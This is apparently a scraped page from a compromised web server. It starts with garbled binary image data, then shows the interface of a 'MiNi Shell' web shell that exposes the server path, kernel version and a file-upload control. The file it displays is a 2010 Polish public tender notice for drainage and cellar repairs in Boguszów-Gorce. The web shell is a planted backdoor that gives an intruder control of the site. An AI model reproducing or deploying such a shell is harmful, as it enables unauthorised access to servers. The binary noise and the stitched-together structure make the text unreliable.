JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100810/214609-N-2010.html

<p class="kh_header"><b>Bytom: Likwidacja negatywnych skutków odtworzenia się karbońskiego poziomu wodonośnego w Boguszowie Gorcach - kontynuacja etapu II: remont piwnic podtopionych budynków przy ul. Kościuszki 1, 3, 7 i ul. Masalskiego 1-4, 5, 7 oraz wykonanie indywidualnych drenaży wokół ww. budynków - częściowa realizacja zadania poprzez wykonanie drenażu wokół budynków przy ul. Kościuszki 7 i ul. Masalskiego 1-4, 5, 7.</b><br>
<b>Numer ogłoszenia: 214609 - 2010; data zamieszczenia: 10.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Likwidacja negatywnych skutków odtworzenia się karbońskiego poziomu wodonośnego w Boguszowie Gorcach - kontynuacja etapu II: remont piwnic podtopionych budynków przy ul. Kościuszki 1, 3, 7 i ul. Masalskiego 1-4, 5, 7 oraz wykonanie indywidualnych drenaży wokół ww. budynków - częściowa realizacja zadania poprzez wykonanie drenażu wokół budynków przy ul. Kościuszki 7 i ul. Masalskiego 1-4, 5, 7..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót polega na wykonaniu odwodnienia n/w budynków poprzez wybudowanie sieci kanalizacji drenażowej wokół fundamentów i obejmuje:
1. Drenaż budynku przy ul. Wesołowskiego-Masalskiego 1- 4: wykonanie odwodnienia wokół fundamentów z rur drenarskich o średnicy  zewnętrznej 160 mm na warstwie filtracyjnej ze żwirku filtracyjnego zabezpieczonych geowłókliną filtracyjno-seperacyjną, ułożenie rury kanalizacji zewnętrznej PVC O160 odprowadzające wody z drenażu na wykonanej warstwie filtracyjnej, zabudowa studzienek drenarskich rewizyjnych o średnicy DN 425, wykonanie odwodnienia wokół fundamentów z rur drenarskich o średnicy zewnętrznej 160 mm na warstwie filtracyjnej ze żwirku filtracyjnego zabezpieczonych geowłókliną filtracyjno-seperacyjną, wykonanie wylewki betonowej w piwnicach budynku wraz z wykonaniem izolacji z folii hydroizolacyjnej PE. 
Wykopy pod montaż rurociągów wykonać z pełnym umocnieniem pionowych ścian, przyjąć konieczność odwodnienia z uwagi na silnie nawodniony terenu.
Dodatkowo w ramach realizacji zadania należy wykonać: projekt zmiany organizacji ruchu drogowego na zajęcie pasa drogowego,	prace naprawcze jezdni i chodników,	prace porządkowe, operat geodezyjny powykonawczy.
2. Drenaż budynku przy ul. Wesołowskiego-Masalskiego 5:	wykonanie izolacji pionowej ścian fundamentowych z folii kubełkowej, wykonanie odwodnienia wokół fundamentów z rur drenarskich o średnicy zewnętrznej 160 mm na warstwie filtracyjnej ze żwirku filtracyjnego zabezpieczonych geowłókliną filtracyjno-seperacyjną,  ułożenie rury kanalizacji zewnętrznej PVC O160 odprowadzające wody z drenażu na wykonanej warstwie filtracyjnej, zabudowa studni rewizyjnej żelbetowej i studzienek drenarskich rewizyjnych o średnicy 425 mm.
Wykopy pod montaż rurociągów wykonać z pełnym umocnieniem pionowych ścian, przyjąć konieczność odwodnienia z uwagi na silnie nawodniony teren.
Dodatkowo w ramach realizacji zadania należy wykonać: projekt zmiany organizacji ruchu drogowego na zajęcie pasa drogowego, prace naprawcze jezdni i chodników,	prace porządkowe, operat geodezyjny powykonawczy.
3. Drenaż budynku przy ul. Wesołowskiego-Masalskiego 7: wykonanie izolacji pionowej przy ścianach fundamentowych z folii kubełkowej,	wykonanie odwodnienia wokół fundamentów z rur drenarskich o średnicy zewnętrznej 160 mm na warstwie filtracyjnej ze żwirku filtracyjnego zabezpieczonych geowłókliną filtracyjno-seperacyjną,  ułożenie rury kanalizacji zewnętrznej PVC O160 odprowadzające wody z drenażu na wykonanej warstwie filtracyjnej, zabudowa studni rewizyjnej żelbetowej i studzienek drenarskich rewizyjnych o średnicy 425 mm, odtworzenie drenażu powierzchniowego z korytek ściekowych betonowych. 50% korytek z odzysku.
Wykopy pod montaż rurociągów wykonać ręcznie z pełnym umocnieniem pionowych ścian, przyjąć konieczność odwodnienia z uwagi na silnie nawodniony teren.
Dodatkowo w ramach realizacji zadania należy wykonać: projekt zmiany organizacji ruchu drogowego na zajęcie pasa drogowego, prace naprawcze jezdni i chodników,	prace porządkowe, operat geodezyjny powykonawczy.
4. Drenaż budynku przy ul. Kościuszki 7: wykonanie izolacji pionowej przy ścianach fundamentowych z folii kubełkowej, wykonanie odwodnienia wokół fundamentów z rur drenarskich o średnicy zewnętrznej 160 mm na warstwie filtracyjnej ze żwirku filtracyjnego zabezpieczonych geowłókliną filtracyjno-seperacyjną, ułożenie rury kanalizacji zewnętrznej PVC O160 odprowadzające wody z drenażu na wykonanej warstwie filtracyjnej, zabudowa studni rewizyjnej żelbetowej i studzienek drenarskich rewizyjnych o średnicy 425 mm, oczyszczenie koryta rzeki w rejonie wylotu drenażu z gruzu i osadów,	czyszczenie ze śmieci, liści i gałęzi kanału otwartego przy ul. Pułaskiego. 
Wykopy pod montaż rurociągów wykonać ręcznie z pełnym umocnieniem pionowych ścian, przyjąć konieczność odwodnienia z uwagi na silnie nawodniony teren.
Dodatkowo w ramach realizacji zadania należy wykonać: projekt zmiany organizacji ruchu drogowego na zajęcie pasa drogowego, prace naprawcze jezdni i chodników,	prace porządkowe, operat geodezyjny powykonawczy.

Szczegółowy zakres robót określa przedmiar robót, który stanowi załącznik nr 10. 
do SIWZ. 

5. Roboty należy wykonać zgodnie z dokumentacją pt.: Likwidacja negatywnych skutków odtworzenia się karbońskiego poziomu wodonośnego w Boguszowie Gorcach - Etap I odwodnienie sztolni w Czarnym Borze - Temat: Opracowanie dokumentacji projektowo-kosztorysowej na wykonanie indywidualnych drenaży wokół budynków położonych przy ul. Masalskiego - Wesołowskiego 1-4, 5, 7 i ul. Kościuszki 1, 3, 7, opracowaną w grudniu 2008r. przez AGOS - GEMES Spółka z o.o. w Katowicach, która stanowi załącznik nr 11 do SIWZ. Wykonawca, który zostanie wyłoniony w drodze przetargu (po zaproszeniu do podpisania umowy, a przed jej podpisaniem) będzie zobowiązany do opracowania we współpracy z Zamawiającym harmonogramu rzeczowo - finansowego obejmującego poszczególne zamknięte zakresy robót, wyszczególnione w formularzu cenowym, stanowiącym załącznik nr 8 do SIWZ, które będą określały poszczególne cykle realizacyjne. Harmonogram będzie stanowił podstawę do wystawiania faktur częściowych i faktury końcowej za prowadzone roboty i stanowił będzie załącznik nr 1 do umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.24.52-5, 45.11.12.40-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 18.600,00 zł (słownie: osiemnaście tysięcy sześćset zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien posiadać wiedzę i doświadczenie do wykonania zamówienia - winien specjalizować się na rynku w wykonywaniu robót o charakterze i złożoności porównywalnej z zakresem zamówienia oraz udokumentować realizację w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej roboty odpowiadającej swoim rodzajem, złożonością i wartością robotom stanowiącym przedmiot zamówienia o wartości minimum 350 000,00 zł brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien dysponować odpowiednim potencjałem technicznym i osobami zdolnymi do wykonania zamówienia - w szczególności osobami uprawnionymi do sprawowania samodzielnych funkcji technicznych, w tym kierownika robót posiadającego uprawnienia budowlane do kierowania, nadzorowania i kontroli robót 
w specjalności instalacyjnej w zakresie sieci wodno-kanalizacyjnych zrzeszonego we właściwej Izbie Inżynierów Budownictwa, co należy udokumentować w formie stosownego oświadczenia Wykonawcy załączonego do oferty, stwierdzającego, 
że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają w/w wymagane uprawnienia i przynależność do właściwej izby, jeżeli ustawy nakładają obowiązek ich posiadania.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien znajdować się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. Jeżeli Wykonawca polega na zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków obowiązany jest przedłożyć informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których te podmioty posiadają rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową tych podmiotów, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wykonawca winien być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę minimum 100.000,00 zł (słownie: sto tysięcy złotych).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
</li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełnić druk OFERTA - załącznik nr 1. Ofertę i załączniki należy sporządzić ściśle wg wzorów druków załączonych przez Zamawiającego.
2. Wszystkie przyszłe zobowiązania Wykonawcy związane z umową w sprawie zamówienia publicznego zawiera projekt umowy - załącznik nr 2 do druku OFERTA.
3. Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1
ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 3, 3a, 3b, 3c, 3d do druku OFERTA. W przypadku udostępnienia Wykonawcy wiedzy i doświadczenia, potencjału technicznego, osób zdolnych do wykonania zamówienia lub zdolności finansowych przez inne podmioty, niezależnie od charakteru prawnego łączących go z nimi stosunków, Wykonawca zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, które jest zobowiązany dołączyć do załączników nr 3a, 3b, 3c, 3d do druku OFERTA.
4.Wypełniony formularz cenowy - załącznik nr 8 do druku OFERTA. 
z dołączonym kosztorysem ofertowym szczegółowym sporządzonym w oparciu 
o załączony przedmiar robót stanowiący zał. nr 10 do SIWZ i wizję lokalną.
5. Wypełniony formularz gwarancyjny zgodnie z pkt. 5.2.3 SIWZ - załącznik nr 9 do druku OFERTA.Wykonawca udzieli minimum 36 - miesięcy gwarancji jakości wykonanych robót będących przedmiotem zamówienia.
6.Jeżeli Wykonawca posiada to ma załączyć zezwolenia właściwego organu w zakresie  gospodarki odpadami, odpowiadające przedmiotowi zamówienia, powstałymi w wyniku realizacji zamówienia oraz przejmie na siebie obowiązki jako wytwórca powstałych odpadów. W przypadku gdy Wykonawca nie posiada decyzji w zakresie gospodarki odpadami załączy on do oferty oświadczenie, że przed przystąpieniem do robót związanych z gospodarowaniem odpadami uzyska decyzję w tym zakresie oraz przejmie na siebie obowiązek jako posiadacz odpadów, po uzyskaniu przedmiotowej decyzji. Wykonawca może załączyć do oferty umowę z podmiotem uprawnionym do gospodarowania odpadami, który będzie świadczył w tym zakresie roboty na jego rzecz, zgodnie z opisem w pkt. 3.5.6 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SRK S.A. ul. Strzelców Bytomskich 207, 41-914 Bytom - 30,00 + VAT w przypadku odbioru osobistego (gotówka) lub pocztą (za zaliczeniem)- w przypadku pobrania SIWZ ze strony internetowej - bezpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.08.2010 godzina 09:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 - sekretariat Spółki (II piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com